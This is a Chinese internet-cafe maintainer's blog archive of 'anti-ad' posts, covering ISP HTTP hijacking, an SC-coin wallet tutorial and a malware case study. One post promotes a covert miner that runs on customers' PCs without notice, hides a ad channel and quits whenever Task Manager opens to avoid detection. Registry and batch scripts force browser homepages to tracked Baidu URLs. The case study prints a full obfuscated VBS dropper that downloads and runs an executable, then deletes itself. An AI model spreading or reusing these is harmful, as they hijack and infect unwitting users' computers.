你好:

     感谢你访问我的 Blog ,本博客只提供博主的技术经验分享,你可以在此做简单的留言和评论,我会抽空回复你;若是要深入交流探讨,请联系QQ:47853253或者加QQ群:12012081


 

分类: 反广告预览模式: 普通 | 列表

[Windows]关于映像劫持

Procmon开机启动监控以及使用教程

370Safe【去广告】安装方法&规则图解

浏览器地址跳转、主页被劫持思路分析

[隐藏日志]

PCHunter删除桌面已生成的广告图标教程

彻底解决网吧挖矿

其实这个工具,没有啥技术含量。就是你把进程名字修改成任务管理器的就可以了。
然后挖矿就会自动退出了,如果没有退出,我们就可以知道是哪个进程在挖了,然后排查一下这个进程,就知道是谁在挖了,
我这里送上这个进程工具。
使用方法,做成开机命令就行。
分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 174

 前言:
云储币用户不多,大多数平台没有云储币交易。 以前最大的云储币平台云币网最近停止钱包发放(据不可靠消息称,其合作公司某人将平台里全部数字货币兑换成比特币转款后跑路了,不知事情是否属实。) 国外SC币网虽然多一点,但是因为没法绑定中国银行卡,没法提现。 现在51数字资产(https://www.51szzc.com/)可以注册SC钱包,以下提供教程:

教程:
1:打开51数字资产网站 : https://www.51szzc.com/
2:点右边“注册”
 
3:输入注册信息:
 
获取验证码输入后,注册即可。
注册完毕后,用手机号+密码登入,点右上角用户名那里:
 
进入个人中心:
 
上面红色5项需要设置,其中KC认证只需要KC1就行,不用传身份证什么的!!!
申请钱包方法:
 

点右上角自己手机号,CNY交易区,左边SC现货交易
右边“充值”按钮打开,如果你没有钱包,会提示你申请一个钱包。
点申请就可以了:
 



卖出SC币的方法:
 
 
提现方法:
到“财务中心”提现
 

----
查看挖矿收益和速度方法:
打开网站:https://siamining.com/
输入钱包地址,点“GO”
注意:
1:初次挖矿可能要15-20分钟后才能查看到收益
2:网站显示的是国外的时间
3:网站每隔6个小时支付一次,满500个SC才会支付。支付完后大约2小时到51数字资产钱包。

 

 

 

分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 480

 我们知道电信之前有DNS劫持弹出广告,目前又出现http劫持的方式,在用户浏览器网页右下角弹出弹窗广告。本文分享给大家两种小技巧破解电信劫持广告。

 

  • 电信http劫持广告很多域名或ip地址,可以发现一个添加一个,屏蔽一个
  • 电信DNS劫持广告可以通过修改dns的方法屏蔽
  • 工具/原料

    Chrome

    Proxy Switchy Sharp/Omega

    方法/步骤

    部分电信用户,如果首次打开浏览器,那么经常会有一些几率在页面右下角冒出一个弹窗广告,一般这是电信的http劫持广告。

    例如,这是打开首页的情况,电信用户右下角会出现弹窗广告。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    起初怀疑是百度网站的广告,后来与百度反馈之后,发现应该是电信http劫持广告。

    首先我们到电信网站进行投诉:http://im.189.cn/webclient/index?cityId=5300&info=

    http://www.189.cn/yn/support/fwjd/

    如果电信网站投诉无效,那么这时我们可以通过工信部申诉的方式投诉。

    具体方法是:http://www.chinatcc.gov.cn:8080/cms/shensus/

    打开工信部申诉受理网页,点击电信用户申诉受理按钮。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    仔细阅读电信申诉须知,了解投诉要求。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    然后点击页面下方的

    “我已阅读上述须知”

    和我要申诉的按钮。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    将红框部分信息填写准确完整。最后点击提交即可等待工信部受理案件。

    运气好的话,几天之后电信即可撤销http劫持广告了。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    除此之外,我们还可以通过技术手段,屏蔽电信劫持广告。

    方法是,打开谷歌Chrome浏览器,打开其中Proxy Switchy Sharp

    或者Proxy Switchy Omega扩展,对代理进行设置。

    具体步骤,右击电信弹窗广告部分内容,点击审查元素。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    在源代码中,找到iframe植入广告的网址,一般是域名或者ip地址。

    这些域名或ip地址,就是广告来源。我们将其列入黑名单,让其显示不了广告。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    具体以Proxy Switchy Omega为例,屏蔽广告网址的方法是:

    点击扩展选项。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    创建一种新的情景模式(不妨重命名为banned),然后

    代理服务器设置为127.0.0.1(本机IP地址)或者

    其他明显无法正常访问的ip地址。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    点击“自动切换”,添加一条网址正则规则,将广告域名或ip地址,添加进去。

    情景模式设置为banned,然后点击应用选项,即可成功屏蔽电信劫持广告。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 188

我的sc钱包:

98afd20e10a366f373da5e6f54c0a1011a3867841e68b5ffabfc17aba0e7832a1da01148b587 

V2.0以后的版本为生成单文件,不再有单独的配置文件,方便复制和发放,随便改名!推送到客户机运行即可!
前言:
最近随着数字货币大涨,一些生意不好的网吧用闲置的机器挖矿,虽然可以增加一些收入,但是挖矿同时机器不能做别的。
而做网维的人更苦逼:网吧行业不景气,收入减少,靠着主页增值也赚不了几个钱.....
那么,能不能在客户上网玩游戏的同时挖矿呢?本软件正是为此准备!

特点:
1:本软件可以在开机之后自动挖矿,并且全程自动控制显卡占用、智能识别游戏、完全不影响玩游戏,真正做到用显卡空余资源进行挖矿!!
2:本软件不会出现任何提示,因为sc矿池在国外容易掉,因此本软件会每隔15分钟检测一次矿池连接情况。
3:本软件可以随便改名,支持开机调用!!GTX650以上显卡都可以挖矿!
4:本软件不偷矿,不抽成,但是含一个隐藏广告(无图标,不锁主页,不弹窗,不劫持,不影响上网,绝对安全) 写软件不易,敬请谅解。
5:本软件会根据本人服务器寻找最新矿池,尽量避免丢矿等。
6:本软件会根据设置的进程名自动退出,比如打开GPU-Z或者PcHunter等自动退出,你也可以设置打开任务管理器自动退出。
7:本软件会根据显卡需求动态调整,确保系统流畅。

本软件完全免费,不偷矿。分为免费版和定制版:
免费版:
免费版带有一个广告通道(广告尚未投放),若开始投放,会有隐藏广告,但是绝无图标、弹窗,不锁主页,不影响客户上网。免费版只在Nvidia显卡下运行。
定制版:
定制版:定制版无广告,可选ATi显卡是否挖矿(但是部分ATi显卡兼容性很不好)。定制版一律300元,定制请说明钱包和要排除的进程。
免费版和定制版的基本区别就是以后免费版会投放一个不影响客户使用的隐藏广告

QQ群29572626,欢迎加入讨论。 定制软件或有疑问请联系QQ:8057867


收益说明:
本软件挖的是SC币,你需要有一个SC钱包, sc币价格并不高,专门挖当然不划算,因此网吧老板就不用指望挖这个了。近期SC币也从1.3跌到0.67了,但是作为网吧维护人员还是有的挖的。
按现在的价格(0.062),如果你维护的网吧平均在线1000台电脑的话,一天应该能收个1000块钱左右(比做增值和维护强得多吧!)。

没有钱包的请先注册SC币钱包
钱包注册、提现、收益查看请移步:
http://bbs.txwb.com/thread-2062526-1.html

http://www.cn777.cc/article.asp?id=2092


使用说明:
1:下载程序(地址见帖子最下面),解压,打开 SC网维版生成器 
 

生成后,在文件夹里,有一个叫【SC定制版】的文件,就是你的程序。可以随便改名,投放到客户机即可。
 

如果要打开任务管理器自动退出挖矿,可以把 taskmgr 加到排除进程里面,进程用逗号隔开。


下载地址:

本帖隐藏的内容

百度网盘:
http://pan.baidu.com/s/1hrBG972
解压密码 1234
分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 232

@echo off

reg add "HKEY_CURRENT_USER\Software\360\360se6\Chrome" /v homepage /t REG_SZ /d "NCxodHRwOi8vd3d3LmJhaWR1LmNvbS97ODgzNmEwODFlMmYwYTRkMGFkZDQ2YjI2NmM5NWFmZmR9ezg1MWU5NGMxODdiOTlhZjhlNWRkZTYzMDM0NGE5MWVkfQ==" /f /reg:64

reg add "HKEY_CURRENT_USER\Software\360\360se5\se6" /v homepage /t REG_SZ /d "NCxodHRwOi8vd3d3LmJhaWR1LmNvbS97ODgzNmEwODFlMmYwYTRkMGFkZDQ2YjI2NmM5NWFmZmR9ezg1MWU5NGMxODdiOTlhZjhlNWRkZTYzMDM0NGE5MWVkfQ==" /f /reg:64

reg add "HKEY_CURRENT_USER\Software\360Chrome\Homepage\Default" /v homepage /t REG_SZ /d "aHR0cDovL3d3dy5iYWlkdS5jb20vezMwMDk0Yjk1ODNiOTk0ZjFhZTcwNDEwZDA2ZmIxN2NifXtkNzVhNDk4ODI0MWJhNDhjMjg0MTNhOTYxYjZmYmViNn0=" /f /reg:64

查看更多...

分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 189

 近期,有多位用户在深蓝软件SVIP群里反应了遭遇大面积盗号的情况,希望大家一起分析,因为群里都是些上百家的大网维,很快大家对情况进行了汇总和分析。

首先大家注意看cmd.exe 与  cscript.exe 两个文件被利用并连接了不同的电脑的IP。

006.png

005.jpg

 

同时有SVIP用户反应了该病毒在他的网吧通过 1026端口来传播病毒,并抓住了一段VBS,深蓝简单分析一下这段VBS的含义:

这段VBS代码首先是创建了一个对象,为了迷惑用户和杀毒,采取了 replace在命令中插入多个无用的字符,再在使用前替换掉字符。

然后通过 http://的方式下载 bugreport.exe 文件,之后该 VBS以参数的形式运行  ospp.vbs 192.168.0.172:1026 传入IP与端口。

最后VBS在运行完所有功能后会删除自身。

001.jpg

 

下载的病毒是免杀的,是否是收费机中毒还是和收费软件被利用有关?有待进一步验证。

003.jpg

 

扫描局域网后发现只有收费机开了1026端口。

004.jpg

 

解决办法

用户测试后,屏蔽1026口后问题解决。后面端口可能会变,思路就是这样,灵活去处理吧。

 

评论中的补充,感谢cwfwan

cmd /c "echo dim m,s,k:m=^"MEiEcErEosoft.XEMELEHETETEP^":b=^"ACDCOCDCBC.CSCtCrCeCaCm^":k=^"ScKriptKing.FiKleSystKemObjKect^":Set x=CreateObject(replace(m,^"E^",^"^")):Set w=CreateObject(^"Wscript.Shell^"):Set v=w.Environment(^"Process^"):x.Open ^"GET^",replace(^"hEtEtpE:E//^",^"E^",^"^") ^& Wscript.Arguments(0) ^& ^"/www/bugreport.exe^",0:x.Send():If x.status=200 Then:Set s=CreateObject(replace(b,^"C^",^"^")):s.Mode=3:s.Type=1:s.Open():f=v.Item(^"APPDATA^") ^& ^"\bugreport.exe^":s.Write x.ResponseBody:s.SaveToFile f,2:wscript.sleep(1000):w.Run(^"cmd /c ^"^"^" ^& f ^& ^"^"^"^"):End If:Set o=CreateObject(replace(k,^"K^",^"^")):o.DeleteFile(wscript.scriptfullname)" ˃ C:\WINDOWS\ospp.vbs

更新 2016.08.06

  感谢用户抓到样本发过来,供分析。

更新 2016.08.15

  开机命令加入了cscript.exe和wscript.exe这2个文件的映像劫持了 //感谢网友 让故事继续 提供

分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 179

你可能不知道你已经被运营商劫持了

 大家想必一定遇到过这种小助(guang )手( gao ):

这个是移动,当然联通和电信也绝对不会放过你,而且网页中间也能加

还有PC端

其实,你看到的这些广告都是中途被别人暗地里加的,这个别人就是中国特色的合法的黑客-运营商

运营商劫持主要分两种:
一种叫DNS劫持,DNS劫持简单粗暴,会把你重新定位到其它网站,比如比如假设你想访问中国银行,正常的DNS 解析IP应该是中国银行的IP地址(假设是10.1.2.3),但是中间者修改这个DNS解析结果,返回用户一个非中国网银行的IP(假设是10.2.3.4),那么用户就会和这个非中国银行的网站建立连接并产生网络传输。钓鱼网站就是这么干的,钓鱼网站是一个仿冒网站,当你输入用户名、密码它会记住你网上银行的用户名、密码,并用于非法的勾当。你本来想存钱,但钱存到了贼的手里,因为这个违法性实在太大,所以监管会比较严,现在已经不多见了。
DNS劫持的主要预防方法是使用固定的DNS地址,比如8.8.8.8 114.114.114.114,比较简单

另外一种就是HTTP劫持了,一旦运营商发现你的是HTTP请求,就会在里面插入广告,你本来想买块巧克力,运营商确在里面放一坨屎 ,由于国内监管困难,所以我们经常会看到那么多辣眼睛的网站:大波与大腿齐飞,屎尿共低俗一色。 恶心的让人想吐,而且不仅是成人,小朋友的网站也无法避免,我们的下一代就在充斥着色情暴力的环境中成长。

他们是怎么干的呢?我们用一幅图来表示

图中小明本来想上coding.com网站的,经过运营商的时候发现小明发起了一个HTTP请求,大家知道HTTP请求是在网络中是明文传输,而且必须经过运营商,于是运营商就能往里买塞任何东西了。常见的塞JS代码,我们经常看到屏幕上方或者下方的广告就是这样的了;另外一种是它把正常网页的内容全部塞到一个iframe里面,这样广告屏蔽软件就无效了,一旦屏蔽会导致全站都被屏蔽,整个网站都不能活了。不仅给你插广告,而且插的你毫无办法,你胆敢屏蔽我么?难道你不想上网了!

以下是腾讯的某个网站的检测报告:

总体1500万pv的业务,一天竟然有200万的劫持上报,7.5个用户中,就接近有1个用户出现被劫持的情况。
可见,各种运营商(尤其是移动联通)的心是有多黑!胆子是有多大!

如何避免

无法避免,由于是运营商层次的劫持,并不是网站开发者放的,就比如你要回家,必须经过小区的大门,在大门就给你泼一身屎。所以,终端用户无法采取技术手段屏蔽。只有一个法子,投诉,注意哦,你投诉的不是你访问的网站,而是你的网络提供者,是当地的移动、联通电信。

技术手段也能起到一定的效果,但必须在自己的电脑上架设一个代理服务器....我们是一个神奇的国度,被抢劫只能自己想办法...具体方法在月光博客中有介绍,大家可以自行搜索下。但实在实在是不推荐,凭啥我访问正常的网站还要来架设代理服务器?难道人人都必须会写代码吗?

2 对于企业用户而言,其实也完全不必感到愤怒,因为不止是你的小网站,包括BAT, QQ都无法逃脱运营商的魔掌

防(zhēn)狼(cāo)术(dài)
对于网站来说,如果是从Baidu等搜索引擎来的,默认会被Baidu转码,然后给你赤裸裸的贴上广告,如果你的网站不想被剥去外衣、往赤裸的身体上贴广告,加上入下代码即可

HTTPS
HTTPS在应用层又加了SSL协议,会对数据进行加密,当然加密也是有代价的,不同于TCP/IP的三次握手,它需要七次握手,而且加上加密解密等因素,整个系统的性能大概会下降1/10,这样就能基本避免运营商劫持了,毕竟它运营商也会核算成本的,不会像gfw一样有100多层过滤 :)

加代码
如果没法使用HTTPS,就必须在网页中手动加入代码过滤了。具体的思路是网页在浏览器中加载完毕后用JavaScript代码检查所有的外链是否属于白名单,限于篇幅就不写在这里了。大家可以参考这个连接:
http://www.cnblogs.com/kenkof...

 
分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 161

防治运营商HTTP劫持的终极技术手段

 运营商HTTP劫持(非DNS劫持)推送广告的情况相信大家并不陌生,解决的方法大多也是投诉增值业务部门进而投诉工信部。但这种方法费时费力,投诉接听人员并不了解情况导致答非所问的情况有很多,有时候不但受气最终也没能完全解决问题,或者解决问题后过了一段时间复发的情况并不少见。

  近年来,运营商HTTP劫持非但没有收敛,反而变本加厉,玩出了新花样:比如通过HTTP劫持进行密码截获的活动;比如下载软件被替换的情况;比如劫持进行返利(当然返利不是返给你)的情况。

  本文介绍一种技术手段用来防止HTTP劫持,在大多数情况下不但可以解决广告推送的问题,也能解决密码截获和下载软件被替换的情况。最终的效果是运营商停止了HTTP劫持,而非劫持后通过浏览器插件进行广告过滤。此种方法的好处是既不用安装浏览器插件进行广告过滤,也不用额外的服务器(HTTP代理或VPN之类的),并且能防止下载软件被替换和返利劫持,也能在一定程度上防范密码的泄漏。

防治运营商HTTP劫持的终极技术手段

  要说明这种技术手段的工作原理,首先需要说明大多数情况下运营商HTTP劫持的原理:

  在用户的浏览器连上被访问的网站服务器,发送了HTTP请求后,运营商的路由器会首先收到此次HTTP请求,之后运营商路由器的旁路设备标记此TCP连接为HTTP协议,之后可以抢在网站服务器返回数据之前发送HTTP协议的302代码进行下载软件的劫持,浏览器收到302代码后就会跳转到错误的软件下载地址下载软件了,随后网站服务器的真正数据到达后反而会被丢弃。或者,旁路设备在标记此TCP连接为HTTP协议后,直接返回修改后的HTML代码,导致浏览器中被插入了运营商的广告,随后网站服务器的真正数据到达后最终也是被丢弃。

  从上述原理中看出,如果需要进行HTTP劫持,首先需要进行标记:如果是HTTP协议,那么进行劫持,否则不进行劫持。那么,是否有一种方法,既可以避免被旁路设备标记为HTTP协议,而目标网站收到的仍旧是原来的HTTP请求,并且不需要任何第三方服务器呢?答案是有的:

  旁路设备中检测HTTP协议的模块通常比较简单,一般只会检测TCP连接建立后的第一个数据包,如果其是一个完整的HTTP协议才会被标记;如果并非是一个完整的HTTP协议,由于无法得到足够多的劫持信息,所以并不会被标记为HTTP协议(我们伟大的防火墙并非如此,会检查后续数据包,所以这种方法无效)。了解了这种情况后,防止劫持的方法就比较简单了:将HTTP请求分拆到多个数据包内,进而骗过运营商,防止了HTTP劫持。而目标网站的操作系统的TCP/IP协议栈比较完善,收到的仍旧是完整的HTTP请求,所以也不会影响网页浏览。

  那么如何将浏览器发出的HTTP请求拆分到多个数据包中呢?我们可以在本地架设一个代理服务器,在代理服务器将浏览器的HTTP请求进行拆包,浏览器设置本地的代理服务器即可。我这里经过测试,默认设置的情况下对三大运营商(电信、联通、移动)的HTTP劫持现象都有很好的抑制作用。

  这个软件是个开源软件,代码在: https://github.com/lehui99/ahjs5s 。如果发现有什么问题,欢迎在Github上提Issue。如果有更新,我也会第一时间更新到Github上。


除非注明,月光博客文章均为原创,转载请以链接形式标明本文地址 

本文地址:http://www.williamlong.info/archives/4181.html
分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 153

 Windows Registry Editor Version 5.00

;360安全浏览器
[HKEY_CURRENT_USER\Software\360\360se6\Chrome]
"homepage"="NCxodHRwOi8vd3d3LmJhaWR1LmNvbS97ODgzNmEwODFlMmYwYTRkMGFkZDQ2YjI2NmM5NWFmZmR9ezg1MWU5NGMxODdiOTlhZjhlNWRkZTYzMDM0NGE5MWVkfQ=="
[HKEY_CURRENT_USER\Software\360\360se5\se6]
"homepage"="NCxodHRwOi8vd3d3LmJhaWR1LmNvbS97ODgzNmEwODFlMmYwYTRkMGFkZDQ2YjI2NmM5NWFmZmR9ezg1MWU5NGMxODdiOTlhZjhlNWRkZTYzMDM0NGE5MWVkfQ=="
;360极速浏览器
[HKEY_CURRENT_USER\Software\360Chrome\Homepage\Default]
"homepage"="aHR0cDovL3d3dy5iYWlkdS5jb20vezA3NTdlMjI1NjNhMTVlZGQ5MmE0NzUwMGExNzFiNjEyfXszZmI1MzFhMTcxYmNhOGI3ZmMzNjc5ZDhlYWQzY2Y2OH0="
分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 305